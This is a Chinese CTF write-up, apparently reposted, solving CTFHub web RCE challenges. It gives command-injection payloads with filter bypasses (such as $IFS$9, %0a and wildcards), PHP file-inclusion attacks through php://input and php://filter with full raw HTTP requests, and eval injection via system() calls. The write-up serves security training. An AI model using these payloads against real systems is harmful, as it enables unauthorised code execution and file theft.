2. 程式人生 > 其它 >[CTFHub] Web RCE Write ups

[CTFHub] Web RCE Write ups

阿新 發佈:2020-12-30

技術標籤:CTFCTFCTFHub資訊保安

命令注入

輸入

127.0.0.1 | ls -al

檢視檔案

127.0.0.1 | cat [flag檔名]

過濾cat

用less more就行

過濾空格

$IFS$9

代替空格,然後輸入

127.0.0.1|cat$IFS$9lag_3760913111752.php

過濾目錄分隔符

127.0.0.1;cd flag_is_here;cat flag_11132792223723.php

過濾運算子

127.0.0.1;cat flag_209472690126349.php

命令注入-綜合練習

先輸入這個顯示flag檔案所在位置,注意把flag寫成萬用字元

http://challenge-d810582d3784c897.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd$IFS$9fla*_is_here%0als$IFS$9-al

最後答案

http://challenge-d810582d3784c897.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd$IFS$9fla*_is_here%0amore$IFS$9fla*_8941778912527.php

檔案包含

這道題get與post結合起來

get如下

http://challenge-647375ee75c1e32b.sandbox.ctfhub.com:10080/?file=
 
shell.txt

post如下

ctfhub=system("cat /flag");

參考文章:
https://blog.csdn.net/Xxy605/article/details/107556509

https://winny.work/ctfhub技能樹_web_rce之eval、檔案包含/680.html

查詢flag

find / -name flag*

php://input

用burp攔截,傳送到Repeater,然後構造post請求

POST /?file=php://input HTTP/1.1
Host: challenge-b6e75eaa899f147c.sandbox.ctfhub.com:10080
Cache-Control: max-age=
 
0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 38

<?php system('find / -name *flag*');?>

找到flag檔案,輸出
在這裡插入圖片描述
證明是可以使用php://input

遠端包含

這裡POST與GET都可以,為什麼呢?

GET /?file=php://input HTTP/1.1
Host: challenge-4c672ad46ce5abfc.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 29

<?php system('cat /flag*');?>

讀取原始碼

POST /?file=php://filter/resource=/flag HTTP/1.1
Host: challenge-bcf11eabbe47b7f4.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 0

另外一種答案

POST /?file=php://filter/read=convert.base64-encode/resource=/flag HTTP/1.1
Host: challenge-bcf11eabbe47b7f4.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 0

eval執行

http://challenge-88b4fef25925e427.sandbox.ctfhub.com:10080/?cmd=system("find / -name *flag*");

找到flag檔案

http://challenge-88b4fef25925e427.sandbox.ctfhub.com:10080/?cmd=system("cat /flag_29995");

相關推薦

[CTFHub] Web RCE Write ups

技術標籤:CTFCTFCTFHub資訊保安 命令注入 輸入 127.0.0.1 | ls -al 檢視檔案 127.0.0.1 | cat [flag檔名]

CTFHUB-技能樹-Web-RCE(下)

這一篇講命令注入 常用特殊字元:cmd1|cmd2:無論cmd1是否執行成功,cmd2將被執行cmd1&cmd2:無論cmd1是否執行成功,cmd2將被執行cmd1;cmd2:無論cmd1是否執行成功,cmd2將被執行cmd1||cmd2:僅在cmd1執行失敗時才執

CTFHub - Web(四)

最近又是每天忙到裂開,,,淦 xss:   反射型: 1.第一個輸入框與下面Hello後的內容相同,猜測可以通過該輸入,改變頁面內容。

CTFHub - Web(五)

eval執行: 1.進入網頁,顯示原始碼, <?php if (isset($_REQUEST[\'cmd\'])) { eval($_REQUEST[\"cmd\"]);

ctfhub web 前置技能http協議請求方式

非常適合小白入門* 通過本文章你可以學會http協議的八種請求方式以及burpsuite抓包改包的使用。 首先來了解http協議中的八種請求方式 1、OPTIONS 返回伺服器針對特定資源所支援的HTTP請求方法,也可以利用向

CTFHUB-WEB-字元型SQL注入

CTFHUB-WEB-字元型SQL注入 我們先就這此題來了解下如何去判斷是否是字串注入 如何去判斷 1.加單引號,由於固定情況下,資料庫此時的語句為select * from table where name = ‘admin’ ,加入單引號會引起報錯,

ctfhub-web前置技能

Web 前置技能 HTTP協議 請求方式 點開題目網址 根據提示 “使用 CTFHUB Method” 就能得到 flag,那麼改下報文傳送即可

pwn - write ups

[NISACTF2022]ezpie checksec Arch:i386-32-little RELRO:Partial RELRO Stack:No canary found NX:NX enabled PIE:PIE enabled

CTFHub技能樹web(持續更新)--RCE--命令注入--過濾空格

技術標籤:CTFHub 過濾空格 這次過濾了空格,使用ls檢視當前目錄: 127.0.0.1&ls

web安全】PHP無參RCE

介紹 無引數RCE的形式如下,即只允許函式“套娃”,不允許傳入其他引數。 if(\';\' === preg_replace(\'/[^\\W]+\\((?R)?\\)/\', \'\', $_GET[\'code\'])) {

CTFHub題解-技能樹-Web進階-JSON Web Token 【敏感資訊洩露、無簽名】

CTFHub題解-技能樹-Web進階-JSON Web Token(敏感資訊洩露、無簽名、弱金鑰) 題外話:emmmm,停更了辣麼久......我又厚臉皮回來更新了,哈哈哈哈哈~(。・∀・)ノ゙

CTFHub技能樹 Web-資訊洩露 bak檔案

技術標籤:CTFHub WEB WriteupCTFHub技能樹Web-資訊洩露bak檔案writeupCTF CTFHub技能樹 Web-資訊洩露 bak檔案

CTFHub RCE解析

昨天大致學了一下命令執行,那我們今天開始實戰。在CTFHu裡練習一下 1.eval執行

ctfhub技能樹—web前置技能—http協議—請求方式

開啟靶機環境 題目描述為“請求方式” HTTP的請求方式共有八種 1、OPTIONS 返回伺服器針對特定資源所支援的HTTP請求方法,也可以利用向web伺服器傳送‘*’的請求來測試伺服器的功能性

簡單瞭解WEB漏洞-RCE程式碼及命令執行漏洞

​ 在Web應用中有時候程式設計師為了考慮靈活性、簡潔性,會在程式碼呼叫程式碼或命令執行函式去處理。比如當應用在呼叫一些能將字串轉化成程式碼的函式時,沒有考慮使用者是否能控制這個字串將造成程式碼執行漏洞。

CTFhub入門(二)web-資訊洩露

1.\"目錄遍歷\" 分析: I.總共有兩層名為1、2、3、4的資料夾,手動遍歷各資料夾即可找到flag

ctfhub-rce

檔案包含 參考:php手冊,php偽協議總結 PHP手冊對於偽協議的說明:PHP 帶有很多內建 URL 風格的封裝協議,可用於類似 fopen()、 copy()、 file_exists() 和 filesize() 的檔案系統函式。 除了這些封裝協議,還能通過

CTFHUB---RCE

遠端程式碼/命令執行漏洞  1.eval執行 <?phpif (isset($_REQUEST[\'cmd\'])) {    eval($_REQUEST[\"cmd\"]);} else {    highlight_file(__FILE__);}?>

如何通過配置檔案安裝web專案到iPhone上

今天給大家介紹一下東西,叫做Web Clip,效果如下圖。 其實就是類似一個我們在Safari中,將網頁儲存到桌面是一個意思,但是可能使用者不懂怎麼去操作。那麼今天我們就可以通過Web Clip配置一個.mobileconfig檔案,

Flutter web 環境配置&專案建立

話不多說,flutter 支援web已經有一段時間了。最近因為單位有web需求,本身我是做iOS的,對web的熟悉程度還不及Flutter,並且單位的需求,不一定會用在生產環境之中,遂決定採用還在beta中的flutter web進行開發。